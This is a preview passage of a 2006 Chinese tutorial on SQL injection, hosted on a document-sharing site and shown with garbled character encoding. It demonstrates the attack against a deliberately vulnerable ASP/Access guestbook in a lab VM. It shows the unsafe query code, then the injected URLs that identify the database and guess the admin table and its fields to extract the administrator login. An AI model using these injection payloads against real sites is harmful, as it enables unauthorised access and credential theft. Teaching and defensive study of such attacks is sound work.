sql注入攻擊技術(shù)初探

sql注入攻擊技術(shù)初探

ID:18565798

大?。?.68 MB

頁(yè)數(shù):46頁(yè)

時(shí)間:2018-09-19

sql注入攻擊技術(shù)初探_第1頁(yè)
sql注入攻擊技術(shù)初探_第2頁(yè)
sql注入攻擊技術(shù)初探_第3頁(yè)
sql注入攻擊技術(shù)初探_第4頁(yè)
sql注入攻擊技術(shù)初探_第5頁(yè)
資源描述:

《sql注入攻擊技術(shù)初探》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫(kù)。

1、Sql注入攻擊技術(shù)初探整理:BlackhumorSite:www.hack41.cn2006.6.19完稿簡(jiǎn)介:sql注入一般針對(duì)基于web平臺(tái)的應(yīng)用程序由于很多時(shí)候程序員在編寫程序的時(shí)候沒(méi)有對(duì)瀏覽器端提交的參數(shù)進(jìn)行合法的判斷,可以由用戶自己修改構(gòu)造參數(shù)(也可以是sql查詢語(yǔ)句),并傳遞至服務(wù)器端獲取想要的敏感信息甚至執(zhí)行危險(xiǎn)代碼和系統(tǒng)命令就形成了sql注入漏洞,時(shí)至今日任然有很大一部分網(wǎng)站存在sql注入漏洞,可想而知sql注入攻擊的危害,下面就目前sql注入攻擊技術(shù)進(jìn)行總結(jié),讓我們更加了解這種攻擊與防御方法一、access數(shù)據(jù)庫(kù)注入攻擊技術(shù)目前國(guó)內(nèi)很大一部分網(wǎng)站都是采用

2、asp+access搭建成的本文演示網(wǎng)站是在虛擬機(jī)搭建的一套留言板程序http://192.168.80.128:8181/bbs/index.asp(留言板首頁(yè))點(diǎn)擊公告連接此時(shí)注意觀察地址欄http://192.168.80.128:8181/bbs/gshow.asp?id=1Gshow.asp后面跟了一個(gè)id參數(shù),其值為數(shù)字1,下面我們來(lái)看一下服務(wù)器端的gshow.asp中的讀取公告內(nèi)容的代碼<%setrs=server.CreateObject("adodb.recordset")sql="select*fromgonggaowhereid="&request.

3、QueryString("id")rs.opensql,conn,1,3ifrs.eoforrs.bofthenresponse.write("暫無(wú)公告內(nèi)容")else%><%=rs("titles")%>
<%=rs("content")%><%=rs("addtime")%>

<%endifrs.closesetrs=nothing%>可以很明顯的看到程序在接收到瀏覽器端傳遞過(guò)來(lái)的id參數(shù)時(shí),沒(méi)有經(jīng)過(guò)任何過(guò)濾就直接進(jìn)入數(shù)據(jù)接查詢了,那么我們?cè)趺磥?lái)通過(guò)這個(gè)漏洞來(lái)獲取我們想要的信息呢,測(cè)試之前我們是不知道對(duì)方所使用的

4、數(shù)據(jù)庫(kù)類型也不知道數(shù)據(jù)庫(kù)里面有哪些表、字段等等(類似blackboxtest),一般情況下asp可以與access和mssql數(shù)據(jù)庫(kù)結(jié)合,首先我們來(lái)判斷一下數(shù)據(jù)庫(kù)類型在id參數(shù)后面加上andexists(select*frommsysobjects)注:mysysobjects是access的系統(tǒng)表完整的測(cè)試語(yǔ)句:http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*frommsysobjects)回車提交到服務(wù)器端如圖,根據(jù)服務(wù)器返回結(jié)果,(MicrosoftJETDatabaseEngine錯(cuò)誤'8

5、0040e09'不能讀取記錄;在'msysobjects'上沒(méi)有讀取數(shù)據(jù)權(quán)限。/bbs/gshow.asp,行11)說(shuō)明存在msysobjects表,也就是說(shuō)后臺(tái)是采用的access數(shù)據(jù)庫(kù)(若服務(wù)器返回[Microsoft][ODBCSQLServerDriver][SQLServer]對(duì)象名'msysobjects'無(wú)效。則說(shuō)明是sqlserver數(shù)據(jù)庫(kù),相關(guān)方法會(huì)在下面講述,這里重點(diǎn)討論access數(shù)據(jù)庫(kù))下面我們來(lái)進(jìn)一步獲取我們想要的信息一般網(wǎng)站重要的信息就是后臺(tái)管理員登陸帳號(hào)密碼了,我們提交http://192.168.80.128:8181/bbs/gshow.

6、asp?id=1andexists(select*fromusers)(判斷數(shù)據(jù)庫(kù)中是否存在users表)根據(jù)圖中返回結(jié)果提示users表不存在,那么我們繼續(xù)來(lái)提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromadmin服務(wù)器端返回的數(shù)據(jù)和http://192.168.80.128:8181/bbs/gshow.asp?id=1一樣這是因?yàn)閰?shù)一起帶入數(shù)據(jù)庫(kù)里面就變成了select*fromgonggaowhereid=1andexists(select*fromadmin)由于存在ad

7、min表?xiàng)l件成立就和select*fromgonggaowhereid=1的查詢返回結(jié)果一樣了,找到了admin表現(xiàn)在就以此類推猜測(cè)字段提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectuserfromadmin)服務(wù)器返回”至少一個(gè)參數(shù)沒(méi)有被指定值”說(shuō)明不存在user字段,繼續(xù)提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectadminfromadmin)服務(wù)器返回正常,說(shuō)明

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文

此文檔下載收益歸作者所有

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學(xué)公式或PPT動(dòng)畫的文件,查看預(yù)覽時(shí)可能會(huì)顯示錯(cuò)亂或異常,文件下載后無(wú)此問(wèn)題,請(qǐng)放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫(kù)負(fù)責(zé)整理代發(fā)布。如果您對(duì)本文檔版權(quán)有爭(zhēng)議請(qǐng)及時(shí)聯(lián)系客服。
3. 下載前請(qǐng)仔細(xì)閱讀文檔內(nèi)容,確認(rèn)文檔內(nèi)容符合您的需求后進(jìn)行下載,若出現(xiàn)內(nèi)容與標(biāo)題不符可向本站投訴處理。
4. 下載文檔時(shí)可能由于網(wǎng)絡(luò)波動(dòng)等原因無(wú)法下載或下載錯(cuò)誤,付費(fèi)完成后未能成功下載的用戶請(qǐng)聯(lián)系客服處理。
相關(guān)標(biāo)簽